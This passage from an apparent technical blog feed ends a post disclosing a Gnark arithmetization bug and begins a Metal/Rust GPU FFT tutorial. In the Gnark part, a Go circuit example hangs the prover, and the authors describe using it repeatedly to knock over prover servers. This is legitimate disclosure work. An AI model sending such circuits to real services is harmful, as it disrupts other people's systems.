&lt;h2 id=&quot;infinite-loop-during-the-arithmetization&quot;&gt;Infinite loop during the arithmetization&lt;&#x2F;h2&gt;
&lt;p&gt;We found a small bug in the arithmetization code.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s modify our earlier Groth16 example a bit:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;func Example() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; [Y, Z]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    publicVariables := []fr_bn254.Element{fr_bn254.NewElement(2), fr_bn254.NewElement(5)}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; [X]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    secretVariables := []fr_bn254.Element{fr_bn254.NewElement(5)}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* R1CS Building *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; (X * Y) == Z + 5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; X is secret&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Y is public&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Z is public&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; 5 is constant&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    r1cs := cs_bn254.NewR1CS(1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Variables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _ = r1cs.AddPublicVariable(&amp;quot;1&amp;quot;) &#x2F;&#x2F; the ONE_WIRE&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Y := r1cs.AddPublicVariable(&amp;quot;Y&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Z := r1cs.AddPublicVariable(&amp;quot;Z&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    X := r1cs.AddSecretVariable(&amp;quot;X&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Constants&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FIVE := r1cs.FromInterface(5)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    CONST_FIVE_TERM := r1cs.MakeTerm(&amp;amp;FIVE, 0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    CONST_FIVE_TERM.MarkConstant()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Coefficients&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    COEFFICIENT_ONE := r1cs.FromInterface(1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Constraints&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; (1 * X) * (1 * Y) == (1 * Z) + (5 * 1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    constraint := constraint.R1C{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        L: constraint.LinearExpression{r1cs.MakeTerm(&amp;amp;COEFFICIENT_ONE, X)}, &#x2F;&#x2F; 1 * X&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        R: constraint.LinearExpression{r1cs.MakeTerm(&amp;amp;COEFFICIENT_ONE, Y)}, &#x2F;&#x2F; 1 * Y&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        O: constraint.LinearExpression{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            r1cs.MakeTerm(&amp;amp;COEFFICIENT_ONE, Z), &#x2F;&#x2F; 1 * Z&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            CONST_FIVE_TERM, &#x2F;&#x2F; 5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        },&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    r1cs.AddConstraint(constraint)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    constraints, r := r1cs.GetConstraints()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for _, r1c := range constraints {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        fmt.Println(r1c.String(r))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* Universal SRS Generation *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pk, vk, _ := groth16.Setup(r1cs)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* Proving *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rightWitness := buildWitnesses(r1cs, publicVariables, secretVariables)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    p, _ := groth16.Prove(r1cs, pk, rightWitness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* Verification *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    publicWitness, _ := rightWitness.Public()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verifies := groth16.Verify(p, vk, publicWitness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fmt.Println(&amp;quot;Verifies with the right public values :&amp;quot;, verifies == nil)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    wrongPublicVariables := []fr_bn254.Element{fr_bn254.NewElement(1), fr_bn254.NewElement(5)}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    wrongWitness := buildWitnesses(r1cs, wrongPublicVariables, secretVariables)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    wrongPublicWitness, _ := wrongWitness.Public()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verifies = groth16.Verify(p, vk, wrongPublicWitness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fmt.Println(&amp;quot;Verifies with the wrong public values :&amp;quot;, verifies == nil)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;At first glance it looks like this should work smoothly, but give it a try and run it. Noticed something wrong? If you tried it, your answer would be yes, because after a while you’ll end up with a &lt;code&gt;signal: killed&lt;&#x2F;code&gt; message.&lt;&#x2F;p&gt;
&lt;p&gt;No problem, let’s fix it. Simply remove the following line:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;CONST_FIVE_TERM.MarkConstant()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The difference is just one line; we are doing the same as above, except we are not marking the constant term as constant.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-problem&quot;&gt;The problem&lt;&#x2F;h2&gt;
&lt;p&gt;If you run the fix above, you’ll see that execution finishes successfully and everyone is happy. Well, not so fast, friend. This means you, as a Gnark user, can bypass the issue and build a working circuit. A malicious user, however, can still create faulty circuits that break execution.&lt;&#x2F;p&gt;
&lt;p&gt;With this exploit, a server running a Gnark prover that accepts arbitrary circuits (languages such as Noir and Aleo Instructions allow this behaviour) can be brought down through a denial-of-service attack. A user can repeatedly send the faulty circuit shown above for execution, wasting cycles and forcing crashes over and over.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;Gnark is, from our point of view, one of the best libraries for developing ZKP applications, with pros and cons depending on what you want to do. In general, if you want to develop ZKP apps, the high-level API will be good enough for you. In our case, we needed to go a little deeper, and because of that we found some flaws.&lt;&#x2F;p&gt;
&lt;p&gt;So if you’re interested in learning more about how to develop ZKP applications using Gnark, stay tuned for our upcoming blog post. We will provide you with a step-by-step guide and show you how easy it can be to build powerful and secure ZKP applications using this amazing library.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Using Metal and Rust to make FFT even faster</title>
          <pubDate>Fri, 17 Mar 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/using-metal-and-rust-to-make-fft-even-faster/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/using-metal-and-rust-to-make-fft-even-faster/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/using-metal-and-rust-to-make-fft-even-faster/">&lt;p&gt;A couple of months ago, we wrote about &lt;a href=&quot;&#x2F;cuda-from-scratch&#x2F;&quot;&gt;CUDA&lt;&#x2F;a&gt;, a programming model developed by NVIDIA to accelerate expensive computations. We explained why, in the context of &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;ZK-SNARKs&lt;&#x2F;a&gt;, it is useful for performing large multiplications.&lt;&#x2F;p&gt;
&lt;p&gt;Today, we want to discuss another development kit that provides an interface to communicate with the Graphics Processing Unit (GPU) called Metal. Metal was developed by Apple as an alternative for running code on GPUs in Mac systems. It provides its own programming language, called Metal Shading Language (MSL), for writing programs that can be executed by the GPU. Additionally, Metal provides an API designed for Swift or Objective-C to run functions written in MSL and manage resources between the CPU and GPU. In this post, we will use a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.rust-lang.org&#x2F;es&quot;&gt;Rust&lt;&#x2F;a&gt; wrapper of this API called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;gfx-rs&#x2F;metal-rs&quot;&gt;Metal-rs&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;At the time of writing this post, we are building &lt;a href=&quot;&#x2F;lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover&#x2F;&quot;&gt;Lambdaworks&lt;&#x2F;a&gt;, a library that makes it easy to program ZK-SNARKs. One of the essential operations required for using ZK-SNARKs is multiplication of polynomials of very high order. We can solve these operations efficiently by using the Fast Fourier Transform (FFT) algorithm, which improves the complexity from $O(N^2)$ to $O(N \log N)$ ($N$ being the order of the polynomial). Additionally, parallelizing all the work of this algorithm on the GPU could lead to even better results when working with these large polynomials. So that is our end goal.&lt;&#x2F;p&gt;
&lt;p&gt;The goal of this post is to learn the basics of MSL and see how to do simple computations with it. Then, we will provide a general overview of what is needed to implement FFT on the GPU. We will use the Rust Language to execute these functions and manage the resources between the CPU and GPU.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;metal-structures&quot;&gt;Metal Structures&lt;&#x2F;h2&gt;
&lt;p&gt;Metal has some general structures for facilitating communication between the CPU and GPU. To create structures in the app, which can then be passed to the GPU for executing a function, there are some necessary steps. Let’s take a look at how they work.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;metal-thread-hierarchy&quot;&gt;Metal Thread Hierarchy&lt;&#x2F;h3&gt;
&lt;p&gt;The basic idea behind parallel computation in the GPU is to run a massive amount of threads organized in different structures. Each thread is responsible for executing a portion of the overall computation, and all of these threads run simultaneously.&lt;&#x2F;p&gt;
&lt;p&gt;In our previous post about CUDA, we covered in detail &lt;a href=&quot;&#x2F;cuda-from-scratch&#x2F;#building-blocks&quot;&gt;how threads are organized&lt;&#x2F;a&gt;, and Metal’s thread structure is quite similar. To help you understand how it works, we’ll give a brief recap, but if you want to learn more, you can check out that section.&lt;&#x2F;p&gt;
&lt;p&gt;Threads are identified in a grid by a coordinate system that depends on the dimensions of the grid. For a 2D grid, the coordinate system would be (x, y). Threads are primarily grouped in threadgroups, which are further divided into Warps or SIMD groups. Threads in a warp execute the same instructions &lt;strong&gt;concurrently&lt;&#x2F;strong&gt; on different data, meaning that if a single thread in the warp were to &lt;em&gt;diverge&lt;&#x2F;em&gt; (e.g. because of an if statement), then the whole warp will execute both branches and hurt performance.&lt;&#x2F;p&gt;
&lt;p&gt;Understanding this structure is essential when deciding how to split computations between threadgroups and which sizes to use for each group. We’ll provide more detail on this topic when we cover some basic examples.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;metal-device&quot;&gt;Metal Device&lt;&#x2F;h3&gt;
&lt;p&gt;The core of the Metal API is the Device, which is an abstraction that represents a GPU in code. You can identify different GPUs and use them for different purposes, but for simplicity’s sake, we’ll just use the default and let Metal automatically select the GPU from our system.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;command-queue&quot;&gt;Command Queue&lt;&#x2F;h3&gt;
&lt;p&gt;In addition to the Device, another essential object to use in Metal is the Command Queue. This represents a basic queue that receives commands, such as packages for execution on the GPU. It’s called a queue because it has a specific order in which things are executed. The command queue not only receives our inputs and functions for execution, but also a lot of other things that are necessary for Metal to work.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;command-buffers&quot;&gt;Command Buffers&lt;&#x2F;h3&gt;
&lt;p&gt;When we talked about “packages” while explaining the Command Queue, we were actually referring to Command Buffers. These buffers work as storage for the functions and computations that we want to execute on the GPU. They don’t run the computations when they are created, but when they are pushed to the Command Queue. There are a few kinds of command buffers for different types of actions, but the ones that we are interested in are the compute commands.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;pipeline-state&quot;&gt;Pipeline State&lt;&#x2F;h3&gt;
&lt;p&gt;This structure represents the GPU state that needs to be set for a specific command. It is initialized with a specific library, which is basically all the code written in MSL that we want to run, and provides all the necessary steps for the GPU to execute it.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;encoders&quot;&gt;Encoders&lt;&#x2F;h3&gt;
&lt;p&gt;For each type of command that we want to run on the GPU using Metal, we use a dedicated type of encoder. However, all encoders serve the same purpose: creating the package that will be our command buffer. The encoder takes the function that we want to run, its arguments, and the pipeline state, and creates a package that will be executed on the GPU. One encoder can be used to create multiple commands, which will be packaged in the same command buffer.&lt;&#x2F;p&gt;
&lt;p&gt;It is important to inform Metal when we have finished encoding all the commands, so that it can push all the created buffers to the queue. We can summarize all these new structures and how they communicate with the following diagram:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;YOBNdIJ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;To better understand how all these structures work together, it is helpful to see some basic examples.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;programming-in-msl-and-rust&quot;&gt;Programming in MSL and Rust&lt;&#x2F;h2&gt;
&lt;p&gt;For the first example we will compute a basic product between arrays.&lt;&#x2F;p&gt;
&lt;p&gt;First, let’s see how our function looks in MSL:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;&lt;code&gt;dotprod.metal&lt;&#x2F;code&gt;&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[[kernel]]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;void dot_product(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  constant uint *inA [[buffer(0)]],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  constant uint *inB [[buffer(1)]],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  device uint *result [[buffer(2)]],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  uint index [[thread_position_in_grid]])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  result[index] = inA[index] * inB[index];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;GPU programs are typically referred to as shaders which contain functions of different types. The &lt;code&gt;kernel&lt;&#x2F;code&gt; keyword in this context means that this is a &lt;strong&gt;compute function&lt;&#x2F;strong&gt; (made for running parallel computations) and makes it accessible from our Rust code. Since we are working with a kernel, we can specify which kind of thread grid it will run on.&lt;&#x2F;p&gt;
&lt;p&gt;Some arguments can be in different address spaces, &lt;code&gt;constant&lt;&#x2F;code&gt; and &lt;code&gt;device&lt;&#x2F;code&gt; in our case. Data in the &lt;code&gt;device&lt;&#x2F;code&gt; space is available for the device (another name for the GPU) to read and write. Data in the &lt;code&gt;constant&lt;&#x2F;code&gt; space is read-only.&lt;&#x2F;p&gt;
&lt;p&gt;You may notice that the function does not contain a &lt;code&gt;for&lt;&#x2F;code&gt; loop or any similar iteration to execute the product on the array. This is because multiple threads will work in parallel, executing this operation on different positions of the arrays. When we define the dimensions of our grid and the number of threads to use, each thread is assigned a specific position (the &lt;code&gt;index&lt;&#x2F;code&gt; parameter) to execute the task simultaneously. We use this for indexing, mapping one thread to one element in both arrays.&lt;&#x2F;p&gt;
&lt;p&gt;Lastly, the &lt;code&gt;[[buffer(id)]]&lt;&#x2F;code&gt; is an attribute which indicates that a kernel argument points to a specific &lt;code&gt;buffer&lt;&#x2F;code&gt;, which is a collection of data in memory that can be shared between the CPU and the GPU. When we define these buffers (in our main app), we set an index for the GPU to create a pointer to the buffer and use it accordingly. The 0, 1, 2 refer to the indexes of the different buffers that we want the kernel to access. To simplify this further, we create the arrays in the Rust code and then copy them to the buffers. The GPU uses these indexes to know where to read and write. Although the attributes are not necessary (buffers will be mapped to arguments in order), it’s a best practice to use them.&lt;&#x2F;p&gt;
&lt;p&gt;Okay, that’s it for the MSL part, so let’s switch to Rust.&lt;&#x2F;p&gt;
&lt;p&gt;First, we have to declare our Device, which is the abstraction of the GPU in our code.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let device: &amp;amp;DeviceRef = &amp;amp;Device::system_default().expect(&amp;quot;No device found&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In this case we let Metal assign a default GPU to use.&lt;&#x2F;p&gt;
&lt;p&gt;Next, we need to reference the function written in MSL. For that, we compile our &lt;code&gt;.metal&lt;&#x2F;code&gt; code to generate a &lt;code&gt;.metallib&lt;&#x2F;code&gt; file, the library that our Rust code will use. To compile the metal file, we run the following commands:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;xcrun -sdk macosx metal -c dotprod.metal -o dotprod.air&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;xcrun -sdk macosx metallib dotprod.air -o dotprod.metallib&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;blockquote&gt;
&lt;p&gt;You’ll need the Xcode tools for this; you can see how to install them &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.freecodecamp.org&#x2F;news&#x2F;how-to-download-and-install-xcode&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;These commands create two new files:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;One with the &lt;code&gt;.air&lt;&#x2F;code&gt; extension, an intermediate representation that Apple recommends compiling to first.&lt;&#x2F;li&gt;
&lt;li&gt;The &lt;code&gt;.metallib&lt;&#x2F;code&gt; file that contains our compiled MSL library.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Now, we can include the new lib in our Rust code&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;const LIB_DATA: &amp;amp;[u8] = include_bytes!(&amp;quot;dotprod.metallib&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;And get a reference to the lib and our function&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let lib = device.new_library_with_data(LIB_DATA).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let function = lib.get_function(&amp;quot;dot_product&amp;quot;, None).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now that we have our metal lib and the function that we want to execute, we can create the Pipeline&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let pipeline = device&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .new_compute_pipeline_state_with_function(&amp;amp;function)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Next, we declare the buffers. These are copies of the structures created in Rust (the arrays &lt;code&gt;v&lt;&#x2F;code&gt; and &lt;code&gt;w&lt;&#x2F;code&gt;) placed in the portion of memory that is shared between the CPU and the GPU.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let length = v.len() as u64;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let size = length * core::mem::size_of::&amp;lt;u32&amp;gt;() as u64;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let buffer_a = device.new_buffer_with_data(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    unsafe { mem::transmute(v.as_ptr()) }, &#x2F;&#x2F; bytes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    size, &#x2F;&#x2F; length&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MTLResourceOptions::StorageModeShared, &#x2F;&#x2F; Storage mode&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
